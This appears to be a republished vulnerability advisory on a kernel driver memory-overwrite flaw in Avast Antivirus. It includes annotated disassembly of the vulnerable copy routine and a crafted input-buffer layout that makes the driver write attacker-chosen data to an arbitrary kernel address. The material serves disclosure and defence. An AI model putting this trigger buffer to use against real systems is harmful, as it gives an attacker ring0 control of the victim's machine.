‘Avast Antivirus Device Driver Memory Overwriting Vulnerability’

Summary

Avast Antivirus is ‘very common antivirus software package with a big worldwide userbase’.

A device driver memory overwriting vulnerability has been discovered in Avast Antivirus. Successful exploitation allows attacker to obtain full system control (ring0 privileges).’

Credit:

‘The information has been provided by Piotr Bania.
The original article can be found at: http://pb.specialised.info/all/adv/avast-adv.txt


Details

‘The vulnerability is caused by lack of bounds checking procedure in the device driver. By sending special signal(s) together with a specially crafted input buffer attackers can force Avast Asynchronous Virus Monitor to overwrite specified memory with data provided by the attacker.

Here is the one of vulnerable codes:
(DISASSEMBLY OF Aavmker4 DEVICE DRIVER)
.text:00010901 loc_10901: ; CODE XREF:
; sub_10604+2A8j
.text:00010901 mov eax, [ebx+0Ch] ; eax=input buffer
.text:00010904 xor edx, edx ; edx=0
.text:00010906 mov [ebp+var_8], eax; store
.text:00010909 cmp [eax], edx ; input buffer == 0?
.text:0001090B jz short loc_10966 ; if so -> exit
.text:0001090D mov edi, [eax+870h] ; edi=addres from
; input buffer+870h
.text:00010913 lea esi, [eax+4] ; esi=ptr to input
; buffer+4
.text:00010916 mov ecx, 21Ah ; ecx=21Ah size to
; copy (const)
.text:0001091B rep movsd ; copy

Sending the input buffer written below:
input_buff:
db ‘YOU!’
db 86Ch dup (90h) ; source memory (ESI)
dd 1234567h ; destination address
db ‘GONDIE’

Forces Avast device driver to write data from ‘source memory’ to destination address (here 1234567h).’

Categories: Windows